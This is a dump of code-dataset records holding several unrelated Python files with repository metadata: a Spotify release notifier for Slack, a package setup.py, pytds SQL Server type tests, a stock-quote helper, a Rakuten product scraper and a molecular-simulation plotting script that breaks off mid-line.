continue\n\n return albums, singles\n\ndef notify_new_releases_album(items, url): \n data = {\n \"blocks\": []\n }\n\n if len(items) == 0:\n data[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": 
\"plain_text\",\n \"text\": \"Seems like no releases for today...🥺\"\n }\n }\n )\n else:\n for item in items:\n artists = get_combined_artists_name(item[\"artists\"])\n album_title = item[\"name\"]\n spotify_link = item[\"external_urls\"][\"spotify\"]\n # 用意されているサムネは常に[640x640, 300x300, 64x64]の3種類という前提\n thumbnail_url = item[\"images\"][1][\"url\"]\n\n data[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f\"*{album_title}* \\n{artists}\\n<{spotify_link}|Listen On Spotify>\"\n },\n \"accessory\": {\n \"type\": \"image\",\n \"image_url\": thumbnail_url,\n \"alt_text\": \"alt text for image\"\n }\n }\n )\n\n slack = Slack(url)\n slack.post(data)\n\ndef notify_new_releases_single(items, url):\n data = {\n \"blocks\": []\n }\n\n if len(items) == 0:\n data[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": \"Seems like no releases for today...🥺\"\n }\n }\n )\n else:\n for item in items:\n artists = get_combined_artists_name(item[\"artists\"])\n album_title = item[\"name\"]\n spotify_link = item[\"external_urls\"][\"spotify\"]\n # 用意されているサムネは常に[640x640, 300x300, 64x64]の3種類という前提\n thumbnail_url = item[\"images\"][1][\"url\"]\n\n data[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f\"*{album_title}* \\n{artists}\\n<{spotify_link}|Listen On Spotify>\"\n },\n \"accessory\": {\n \"type\": \"image\",\n \"image_url\": thumbnail_url,\n \"alt_text\": \"alt text for image\"\n }\n }\n )\n\n slack = Slack(url)\n slack.post(data)\n\nif __name__ == \"__main__\":\n main()", "repo_name": "kyokyokyo0217/spotify-python-sandbox", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4874, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "dotenv.dotenv_values", "line_number": 9, "usage_type": "call"}, {"api_name": "spotify.Spotify", "line_number": 18, "usage_type": "call"}, {"api_name": "spotify.authorize", "line_number": 19, "usage_type": "call"}, {"api_name": "spotify.get_new_releases_by_country", "line_number": 21, "usage_type": "call"}, {"api_name": "spotify.get_new_releases_global", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 41, "usage_type": "attribute"}, {"api_name": "slack.Slack", "line_number": 102, "usage_type": "call"}, {"api_name": "slack.post", "line_number": 103, "usage_type": "call"}, {"api_name": "slack.Slack", "line_number": 143, "usage_type": "call"}, {"api_name": "slack.post", "line_number": 144, "usage_type": "call"}]} +{"seq_id": "26886764039", "text": "# coding=utf-8\n# !/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport codecs\nimport os\nimport sys\nfrom distutils.core import setup, Command\nfrom shutil import rmtree\n\nfrom setuptools import find_packages # , setup, Command\n\ntry:\n FileNotFoundError\nexcept NameError:\n FileNotFoundError = IOError\n\nPROJECT_NAME = \"pypi_librarian\"\n\nhere = os.path.abspath(os.path.dirname(__file__))\nwith codecs.open(os.path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = '\\n' + f.read()\nabout = {}\nwith open(os.path.join(here, PROJECT_NAME, \"_version.py\")) as f:\n exec(f.read(), about)\nif sys.argv[-1] == \"publish\":\n os.system(\"python setup.py sdist bdist_wheel upload\")\n sys.exit()\nrequired = [\n 'docopt', # command line parser\n 
'lxml',\n 'pypi-xmlrpc',\n 'requests',\n 'yolk3k'\n]\n\n\nclass UploadCommand(Command):\n \"\"\"Support setup.py publish.\"\"\"\n description = 'Build and publish the package.'\n user_options = []\n\n @staticmethod\n def status(s):\n \"\"\"Prints things in bold.\"\"\"\n print('\\033[1m{0}\\033[0m'.format(s))\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n try:\n self.status('Removing previous builds…')\n rmtree(os.path.join(here, 'dist'))\n except FileNotFoundError:\n pass\n self.status('Building Source distribution…')\n os.system('{0} setup.py sdist'.format(sys.executable))\n\n self.status('Not uploading to PyPi, not tagging github…')\n self.status('Uploading the package to PyPi via Twine…')\n\n os.system('twine upload dist/*')\n self.status('Pushing git tags…')\n os.system('git tag v{0}'.format(about['__version__']))\n os.system('git push --tags')\n sys.exit()\n\nsetup(\n name=PROJECT_NAME,\n version=about['__version__'],\n description='Opinionated, no config build version incrementer. No regex. Drop in and go.',\n long_description=long_description,\n # markdown is not supported. Easier to just convert md to rst with pandoc\n # long_description_content_type='text/markdown',\n author='Matthew Martin',\n author_email='matthewdeanmartin@gmail.com',\n url='https://github.com/matthewdeanmartin/' + PROJECT_NAME,\n packages=find_packages(exclude=['test', 'test.*']),\n entry_points={\n\n 'console_scripts': [\n 'pypi_librarian=pypi_librarian.main:process_docopts',\n ]\n },\n install_requires=required,\n extras_require={},\n include_package_data=True,\n license='MIT',\n keywords=\"pypi, package metadata\",\n classifiers=[\n 'Programming Language :: Python',\n # 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: Implementation :: CPython',\n #'Programming Language :: Python :: Implementation :: PyPy',\n ],\n cmdclass={'upload': UploadCommand, },\n setup_requires=[],\n)\n", "repo_name": "matthewdeanmartin/pypi_librarian", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 3038, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.abspath", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 19, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 27, "usage_type": "call"}, {"api_name": "distutils.core.Command", "line_number": 37, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 60, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 60, "usage_type": "attribute"}, 
{"api_name": "os.system", "line_number": 65, "usage_type": "call"}, {"api_name": "os.system", "line_number": 67, "usage_type": "call"}, {"api_name": "os.system", "line_number": 68, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 69, "usage_type": "call"}, {"api_name": "distutils.core.setup", "line_number": 71, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "71233635073", "text": "# coding=utf-8\nimport datetime\nfrom decimal import Decimal, Context\nimport uuid\n\nimport pytest\nimport six\n\nimport pytds\n\nfrom fixtures import *\n\n\n@pytest.mark.parametrize('sql_type', [\n \"tinyint\",\n \"smallint\",\n \"int\",\n \"bigint\",\n \"real\",\n \"float\",\n \"smallmoney\",\n \"money\",\n \"decimal\",\n \"varbinary(15)\",\n \"binary(15)\",\n \"nvarchar(15)\",\n \"nchar(15)\",\n \"varchar(15)\",\n \"char(15)\",\n \"bit\",\n \"smalldatetime\",\n \"date\",\n \"time\",\n \"datetime\",\n \"datetime2\",\n \"datetimeoffset\",\n \"uniqueidentifier\",\n \"sql_variant\",\n])\ndef test_null_parameter(cursor, sql_type):\n cursor.execute(\"set nocount on; declare @x {} = %s; select @x\".format(sql_type), (None,))\n val, = cursor.fetchone()\n assert val is None\n\n\ndef test_reading_values(cursor):\n cur = cursor\n with pytest.raises(pytds.ProgrammingError):\n cur.execute(u'select ')\n assert 'abc' == cur.execute_scalar(\"select cast('abc' as varchar(max)) as fieldname\")\n assert 'abc' == cur.execute_scalar(\"select cast('abc' as nvarchar(max)) as fieldname\")\n assert b'abc' == cur.execute_scalar(\"select cast('abc' as varbinary(max)) as fieldname\")\n #assert 12 == cur.execute_scalar('select cast(12 as bigint) as fieldname')\n assert 12 == cur.execute_scalar('select cast(12 as smallint) as fieldname')\n assert -12 == cur.execute_scalar('select -12 as fieldname')\n assert 12 == cur.execute_scalar('select cast(12 as tinyint) as fieldname')\n assert True == cur.execute_scalar('select cast(1 as bit) as fieldname')\n assert 5.1 == cur.execute_scalar('select cast(5.1 as float) as fieldname')\n cur.execute(\"select 'test', 20\")\n assert ('test', 20) == cur.fetchone()\n assert 'test' == cur.execute_scalar(\"select 'test' as fieldname\")\n assert 'test' == cur.execute_scalar(\"select N'test' as fieldname\")\n assert 'test' == cur.execute_scalar(\"select cast(N'test' as ntext) as fieldname\")\n assert 'test' == cur.execute_scalar(\"select cast(N'test' as text) as fieldname\")\n assert 'test ' == cur.execute_scalar(\"select cast(N'test' as char(5)) as fieldname\")\n assert 'test ' == cur.execute_scalar(\"select cast(N'test' as nchar(5)) as fieldname\")\n assert b'test' == cur.execute_scalar(\"select cast('test' as varbinary(4)) as fieldname\")\n assert b'test' == cur.execute_scalar(\"select cast('test' as image) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as image) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as varbinary(10)) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as ntext) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as nvarchar(max)) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as xml)\")\n assert None is cur.execute_scalar(\"select cast(NULL as varchar(max)) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as nvarchar(10)) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as varchar(10)) as fieldname\")\n assert None == cur.execute_scalar(\"select 
cast(NULL as nchar(10)) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as char(10)) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as char(10)) as fieldname\")\n assert 5 == cur.execute_scalar('select 5 as fieldname')\n with pytest.raises(pytds.ProgrammingError) as ex:\n cur.execute_scalar('create table exec_scalar_empty(f int)')\n # message does not have to be exact match\n assert \"Previous statement didn't produce any results\" in str(ex.value)\n\n\ndef test_money(cursor):\n cur = cursor\n assert Decimal('0') == cur.execute_scalar(\"select cast('0' as money) as fieldname\")\n assert Decimal('1') == cur.execute_scalar(\"select cast('1' as money) as fieldname\")\n assert Decimal('1.5555') == cur.execute_scalar(\"select cast('1.5555' as money) as fieldname\")\n assert Decimal('1234567.5555') == cur.execute_scalar(\"select cast('1234567.5555' as money) as fieldname\")\n assert Decimal('-1234567.5555') == cur.execute_scalar(\"select cast('-1234567.5555' as money) as fieldname\")\n assert Decimal('12345.55') == cur.execute_scalar(\"select cast('12345.55' as smallmoney) as fieldname\")\n\n\ndef test_strs(cursor):\n cur = cursor\n assert isinstance(cur.execute_scalar(\"select 'test'\"), six.text_type)\n\n\n@pytest.mark.parametrize('val', [u'hello',\n u'x' * 5000,\n 'x' * 9000,\n 123,\n -123,\n 123.12,\n -123.12,\n 10 ** 20,\n 10 ** 38 - 1,\n -10 ** 38 + 1,\n datetime.datetime(2011, 2, 3, 10, 11, 12, 3000),\n Decimal('1234.567'),\n Decimal('1234000'),\n Decimal('9' * 38),\n Decimal('0.' + '9' * 38),\n Decimal('-' + ('9' * 38), Context(prec=38)),\n Decimal('1E10'),\n Decimal('1E-10'),\n Decimal('0.{0}1'.format('0' * 37)),\n None,\n 'hello',\n '',\n pytds.Binary(b''),\n pytds.Binary(b'\\x00\\x01\\x02'),\n pytds.Binary(b'x' * 9000),\n 2 ** 63 - 1,\n False,\n True,\n uuid.uuid4(),\n u'Iñtërnâtiônàlizætiøn1',\n u'\\U0001d6fc',\n ])\ndef test_select_values(cursor, val):\n cursor.execute('select %s', (val,))\n assert cursor.fetchone() == (val,)\n assert cursor.fetchone() is None\n\n\nuuid_val = uuid.uuid4()\n\n\n@pytest.mark.parametrize('result,sql', [\n (None, \"cast(NULL as varchar)\"),\n ('test', \"cast('test' as varchar)\"),\n ('test ', \"cast('test' as char(5))\"),\n ('test', \"cast(N'test' as nvarchar)\"),\n ('test ', \"cast(N'test' as nchar(5))\"),\n (Decimal('100.55555'), \"cast(100.55555 as decimal(8,5))\"),\n (Decimal('100.55555'), \"cast(100.55555 as numeric(8,5))\"),\n (b'test', \"cast('test' as varbinary)\"),\n (b'test\\x00', \"cast('test' as binary(5))\"),\n (datetime.datetime(2011, 2, 3, 10, 11, 12, 3000), \"cast('2011-02-03T10:11:12.003' as datetime)\"),\n (datetime.datetime(2011, 2, 3, 10, 11, 0), \"cast('2011-02-03T10:11:00' as smalldatetime)\"),\n (uuid_val, \"cast('{0}' as uniqueidentifier)\".format(uuid_val)),\n (True, \"cast(1 as bit)\"),\n (128, \"cast(128 as tinyint)\"),\n (255, \"cast(255 as tinyint)\"),\n (-32000, \"cast(-32000 as smallint)\"),\n (2000000000, \"cast(2000000000 as int)\"),\n (2000000000000, \"cast(2000000000000 as bigint)\"),\n (0.12345, \"cast(0.12345 as float)\"),\n (0.25, \"cast(0.25 as real)\"),\n (Decimal('922337203685477.5807'), \"cast('922,337,203,685,477.5807' as money)\"),\n (Decimal('-214748.3648'), \"cast('- 214,748.3648' as smallmoney)\"),\n])\ndef test_sql_variant_round_trip(cursor, result, sql):\n if not pytds.tds_base.IS_TDS71_PLUS(cursor.connection):\n pytest.skip('Requires TDS7.1+')\n cursor.execute(\"select cast({0} as sql_variant)\".format(sql))\n val, = cursor.fetchone()\n assert result == 
val\n\n\ndef test_collations(cursor, collation_set):\n coll_name_set = collation_set\n\n tests = [\n ('Привет', 'Cyrillic_General_BIN'),\n ('Привет', 'Cyrillic_General_BIN2'),\n ('สวัสดี', 'Thai_CI_AI'),\n ('你好', 'Chinese_PRC_CI_AI'),\n ('こんにちは', 'Japanese_CI_AI'),\n ('안녕하세요.', 'Korean_90_CI_AI'),\n ('你好', 'Chinese_Hong_Kong_Stroke_90_CI_AI'),\n ('cześć', 'Polish_CI_AI'),\n ('Bonjour', 'French_CI_AI'),\n ('Γεια σας', 'Greek_CI_AI'),\n ('Merhaba', 'Turkish_CI_AI'),\n ('שלום', 'Hebrew_CI_AI'),\n ('مرحبا', 'Arabic_CI_AI'),\n ('Sveiki', 'Lithuanian_CI_AI'),\n ('chào', 'Vietnamese_CI_AI'),\n ('ÄÅÆ', 'SQL_Latin1_General_CP437_BIN'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_CP850_BIN'),\n ('ŠşĂ', 'SQL_Slovak_CP1250_CS_AS_KI_WI'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_1251_BIN'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_Cp1_CS_AS_KI_WI'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_1253_BIN'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_1254_BIN'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_1255_BIN'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_1256_BIN'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_1257_BIN'),\n ('ÁÂÀÃ', 'Latin1_General_100_BIN'),\n ]\n for s, coll in tests:\n if coll not in coll_name_set:\n logger.info('Skipping {}, not supported by current server'.format(coll))\n continue\n assert cursor.execute_scalar(\"select cast(N'{}' collate {} as varchar(100))\".format(s, coll)) == s\n\n\ndef skip_if_new_date_not_supported(conn):\n if not pytds.tds_base.IS_TDS73_PLUS(conn):\n pytest.skip('Test requires new date types support, SQL 2008 or newer is required')\n\n\ndef test_date(cursor):\n skip_if_new_date_not_supported(cursor.connection)\n date = pytds.Date(2012, 10, 6)\n cursor.execute('select %s', (date, ))\n assert cursor.fetchall() == [(date,)]\n\n\ndef test_time(cursor):\n skip_if_new_date_not_supported(cursor.connection)\n time = pytds.Time(8, 7, 4, 123000)\n cursor.execute('select %s', (time, ))\n assert cursor.fetchall() == [(time,)]\n\n\ndef test_datetime(cursor):\n time = pytds.Timestamp(2013, 7, 9, 8, 7, 4, 123000)\n cursor.execute('select %s', (time, ))\n assert cursor.fetchall() == [(time,)]\n", "repo_name": "denisenkom/pytds", "sub_path": "tests/types_test.py", "file_name": "types_test.py", "file_ext": "py", "file_size_in_byte": 9996, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 180, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pytest.mark.parametrize", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 48, "usage_type": "call"}, {"api_name": "pytds.ProgrammingError", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 81, "usage_type": "call"}, {"api_name": "pytds.ProgrammingError", "line_number": 81, "usage_type": "attribute"}, {"api_name": "decimal.Decimal", "line_number": 89, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 90, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 91, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 92, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 93, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 94, "usage_type": "call"}, {"api_name": "six.text_type", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 102, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 102, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 112, "usage_type": "call"}, 
{"api_name": "decimal.Decimal", "line_number": 113, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 114, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 115, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 116, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 117, "usage_type": "call"}, {"api_name": "decimal.Context", "line_number": 117, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 118, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 119, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 120, "usage_type": "call"}, {"api_name": "pytds.Binary", "line_number": 124, "usage_type": "call"}, {"api_name": "pytds.Binary", "line_number": 125, "usage_type": "call"}, {"api_name": "pytds.Binary", "line_number": 126, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 130, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 140, "usage_type": "call"}, {"api_name": "pytds.tds_base.IS_TDS71_PLUS", "line_number": 168, "usage_type": "call"}, {"api_name": "pytds.tds_base", "line_number": 168, "usage_type": "attribute"}, {"api_name": "pytest.skip", "line_number": 169, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 143, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 143, "usage_type": "attribute"}, {"api_name": "decimal.Decimal", "line_number": 149, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 150, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 153, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 154, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 164, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 165, "usage_type": "call"}, {"api_name": "pytds.tds_base.IS_TDS73_PLUS", "line_number": 214, "usage_type": "call"}, {"api_name": "pytds.tds_base", "line_number": 214, "usage_type": "attribute"}, {"api_name": "pytest.skip", "line_number": 215, "usage_type": "call"}, {"api_name": "pytds.Date", "line_number": 220, "usage_type": "call"}, {"api_name": "pytds.Time", "line_number": 227, "usage_type": "call"}, {"api_name": "pytds.Timestamp", "line_number": 233, "usage_type": "call"}]} +{"seq_id": "13726716576", "text": "#coding=utf-8\n\nimport requests\nimport time\nimport ujson\n\n\nclass Point:\n\n sinaURL = 'http://hq.sinajs.cn'\n\n def __init__(self):\n #股票代码\n self.code = None\n #股票名称\n self.name = None\n #开盘价\n self.dayBegin = None\n #收盘价\n self.dayEnd = None\n #昨日收盘价\n self.lastdayEnd = None\n #当前价格\n self.now = None\n #今日最高价\n self.dayMax = None\n #今日最低价\n self.dayMin = None\n #成交的股票数, 由于股票交易以一百股为基本单位,所以在使用时,通常把该值除以一百\n #成交金额,单位w元\n #当前时间\n self.time = None\n\n @classmethod\n def getNow(cls, code):\n url = cls.sinaURL + '/list=' + code.lower()\n r = requests.get(url, timeout=10)\n fields = r.text.replace('var hq_str_' + code + '=',\n '').replace(\"\\\"\", '').split(',')\n p = Point()\n p.code, p.name, p.dayBegin, p.lastdayEnd, p.now, p.dayMax, p.dayMin, p.time = code, fields[\n 0], float(fields[1]), float(fields[2]), float(fields[3]), float(\n fields[4]), float(fields[5]), ' '.join(\n [fields[-3], fields[-2]])\n return p\n\n def dump(self):\n m = {\n 'code': self.code,\n 'name': self.name,\n 'dayBegin': self.dayBegin,\n 'dayEnd': self.dayEnd,\n 'lastdayEnd': self.lastdayEnd,\n 'now': self.now,\n 'dayMax': self.dayMax,\n 'dayMin': self.dayMin,\n 'time': self.time,\n }\n 
        for k, v in m.items():\n            print(k + ':' + str(v) + \"(%s)\" % type(v))\n\n    def toString(self):\n        m = {\n            'code': self.code,\n            'name': self.name,\n            'dayBegin': self.dayBegin,\n            'dayEnd': self.dayEnd,\n            'lastdayEnd': self.lastdayEnd,\n            'now': self.now,\n            'dayMax': self.dayMax,\n            'dayMin': self.dayMin,\n            'time': self.time,\n        }\n        return ujson.dumps(m)\n\n    @classmethod\n    def isStcokTime(cls):\n        '''\n        Determine whether it is currently A-share trading hours\n        '''\n        return True  # NOTE: unconditional early return; the trading-hours check below is unreachable\n        curStamp = time.time()\n        t = time.localtime(curStamp)\n        if t.tm_wday not in [0, 1, 2, 3, 4]: return False\n        beginTime = int(\n            time.mktime(\n                time.strptime(\n                    \"%s-%s-%s 00:00:00\" % (t.tm_year, t.tm_mon, t.tm_mday),\n                    \"%Y-%m-%d %H:%M:%S\")))\n        time_9_30 = beginTime + 9 * 3600 + 1800\n        time_11_30 = beginTime + 11 * 3600 + 1800\n        time_13_00 = beginTime + 13 * 3600\n        time_15_00 = beginTime + 15 * 3600\n        if curStamp >= time_9_30 and curStamp <= time_11_30 or curStamp >= time_13_00 and curStamp <= time_15_00:\n            return True\n        return False\n", "repo_name": "lycclsltt/stock", "sub_path": "lib/point.py", "file_name": "point.py", "file_ext": "py", "file_size_in_byte": 2946, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "ujson.dumps", "line_number": 74, "usage_type": "call"}, {"api_name": "time.time", "line_number": 82, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 83, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 86, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "22858768857", "text": "\n\nfrom random import choice\nimport urllib2\nimport urllib\nimport json\nimport re\n\nfrom django.conf import settings\nfrom lxml import etree\n\nfrom .base import VendorBase, ProductOverview\n\n\nRAKUTEN_ENDPOINT = \"https://app.rakuten.co.jp/services/api/Product/Search/20140305\"\n\nWEIGHT_PATTERN = re.compile(\"[0-9,\\.]+\\s*k?g\", re.IGNORECASE)\n\ndef find_weight(keyvalues):\n    if not keyvalues: return \"\"\n\n    for item in keyvalues:\n        if \"detail\" in item:\n            d = item[\"detail\"]\n            name = item.get(\"name\") or \"\"\n            value = item.get(\"value\") or \"\"\n            m = WEIGHT_PATTERN.search(value)\n            if m: return m.group()\n\n    return \"\"\n    \nclass Rakuten(VendorBase):\n    vendor_name = \"rakuten\"\n    \n    def __init__(self):\n        self.conf = choice(settings.RAKUTEN_KEYS)\n    \n    def _search(self, keyword):\n        qs = urllib.urlencode({\n            \"format\": \"json\",\n            \"applicationId\": self.conf[\"applicationId\"],\n            \"developerId\": self.conf[\"applicationId\"],\n            \"affiliateId\": self.conf[\"affiliateId\"],\n            \"keyword\": keyword.encode('utf8')\n        })\n        req = urllib.urlopen(RAKUTEN_ENDPOINT + \"?\" + qs)\n        doc = json.load(req)\n        \n        if 'error' in doc:\n            raise RuntimeError(doc['error'], doc['error_description'])\n        \n        return tuple(self.load_overview(i['Product']) for i in doc['Products'])\n    \n    def fetch_jan(self, url):\n        if not url.startswith(\"http://product.rakuten.co.jp/\"):\n            raise RuntimeError(\"Can not fetch jan from url: %s\" % url)\n        \n        request = urllib2.Request(url, headers={\n            \"Referer\": \"http://product.rakuten.co.jp/\",\n            \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36\"})\n        response = urllib2.urlopen(request)\n        \n        parser = etree.HTMLParser()\n        doc = etree.parse(response, parser)\n        \n        for node in doc.xpath(\"//div[@class='quickInfo']\"):\n            text = 
\"\".join(node.itertext())\n result = re.search(\"(JAN)((\\s)*(:)?(\\s)*)?(?P\\d+)\", text, re.IGNORECASE)\n if result:\n jan = result.groupdict().get('jan')\n if jan: return jan\n \n return ''\n \n def load_overview(self, r):\n return ProductOverview(self.vendor_name, r['productId'],\n r['productName'],\n url=r.get('productUrlPC'),\n currency='JPN',\n price=r.get('averagePrice') or r.get('minPrice') or r.get('salesMinPrice'),\n ean=\"\",\n release_date='',\n manufacturer=r.get('makerNameFormal'),\n weight=find_weight(r.get('ProductDetails')),\n size='',\n )", "repo_name": "yagami-cerberus/thief", "sub_path": "thief/vendors/rakuten.py", "file_name": "rakuten.py", "file_ext": "py", "file_size_in_byte": 2783, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.compile", "line_number": 17, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 17, "usage_type": "attribute"}, {"api_name": "base.VendorBase", "line_number": 32, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 36, "usage_type": "call"}, {"api_name": "django.conf.settings.RAKUTEN_KEYS", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 36, "usage_type": "name"}, {"api_name": "urllib.urlencode", "line_number": 39, "usage_type": "call"}, {"api_name": "urllib.urlopen", "line_number": 46, "usage_type": "call"}, {"api_name": "json.load", "line_number": 47, "usage_type": "call"}, {"api_name": "urllib2.Request", "line_number": 58, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 61, "usage_type": "call"}, {"api_name": "lxml.etree.HTMLParser", "line_number": 63, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 63, "usage_type": "name"}, {"api_name": "lxml.etree.parse", "line_number": 64, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 64, "usage_type": "name"}, {"api_name": "re.search", "line_number": 68, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 68, "usage_type": "attribute"}, {"api_name": "base.ProductOverview", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "15532015863", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\nimport os\r\n\r\n####################################\r\nfile_name = 'dump.2500sc300b.lammpstrj'\r\nsys_atoms = 5548\r\nchain_length = 2500\r\nrod_length = 10\r\nradius = 15\r\n####################################\r\n\r\ndef get_data(file_name):\r\n with open(file_name, 'r') as f:\r\n data = f.readlines()\r\n data_mat = list(map(lambda x:x.split(), data[-sys_atoms:]))\r\n f.close()\r\n return np.array(data_mat, dtype = float)\r\n\r\ndef get_chain(data):\r\n chain = data[np.where(data_mat[:,1]==3.0)[0]]\r\n return chain[np.argsort(chain[:,0], axis=0)]\r\n\r\ndef split_chain(chain):\r\n new_chain = []\r\n for i in range(0, chain_length, rod_length):\r\n new_chain.append(chain[i:i+rod_length,:])\r\n return new_chain\r\n\r\ndef parse_mol(mol):\r\n _mol = mol[np.where(mol[:,2]>0)[0]]\r\n return _mol\r\n\r\ndef _isOnSmallSphere(mol, R=14):\r\n x = mol[:, 2]\r\n if x.max()>R or x.min()<-R:\r\n return True\r\n else:\r\n return False\r\n\r\nif __name__ == '__main__':\r\n data_mat = get_data(file_name)\r\n chain = get_chain(data_mat)\r\n new_chain = split_chain(chain)\r\n for mol in new_chain:\r\n _mol = parse_mol(mol)\r\n if len(_mol)==0:\r\n continue\r\n elif _isOnSmallSphere(_mol, R=radius):\r\n continue\r\n else:\r\n plt.plot(_mol[:,3], _mol[:,4], 
